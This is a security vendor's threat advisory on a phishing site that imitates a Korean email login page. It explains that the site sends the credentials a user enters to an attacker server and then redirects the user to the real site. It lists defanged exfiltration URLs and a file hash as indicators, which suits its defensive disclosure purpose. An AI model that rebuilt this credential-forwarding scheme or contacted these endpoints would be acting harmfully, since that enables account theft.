The ASEC analysis team has identified the distribution of a malicious website in Korea that aims to steal account credentials from a famous Korean email service website.
The phishing website the email is redirected to is disguised as a login page for a Korean email website, and over 50 cases in Korea were confirmed to have accessed the website. Thus users must take particular caution when logging into this email website.
Figure 1. Normal webpage (left) vs phishing webpage (right)
The phishing website is disguised as the login page for the Korean email service as shown below, and when the user enters their ID and password for their account and clicks ‘Login’, the input account credentials are forwarded to the threat actor’s server (hxxps://as-massage[.]ch/wp-includes/mindx/nkuego.php), and ultimately, the user is redirected to the normal website for complete deception.
Figure 2. The account stealing logic inside the phishing website’s javascript
Figure 3. Stealing the account credentials
Figure 4. Redirection to the normal website
A total of 2 phishing websites disguised as this email service have been confirmed until now, and It is likely there are other unidentified URLs as well.
| Account Siphoning URL – hxxps://as-massage[.]ch/wp-includes/mindx/nkuego.php – hxxps://trinimcvx.000webhostapp[.]com/post.phpConfirmed phishing websites |
|---|
Confirmed phishing websites
Figure 5. Number of users who have accessed the above phishing website
V3 Lite is currently responding by blocking the URL as shown below.
Figure 6. V3 blocking phishing website
[IOC Info]
hxxps://as-massage[.]ch/wp-includes/mindx/nkuego.php
hxxps://trinimcvx.000webhostapp[.]com/post.php
9C3ADF3D9F1D5FFA55B3E45283494D4F
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information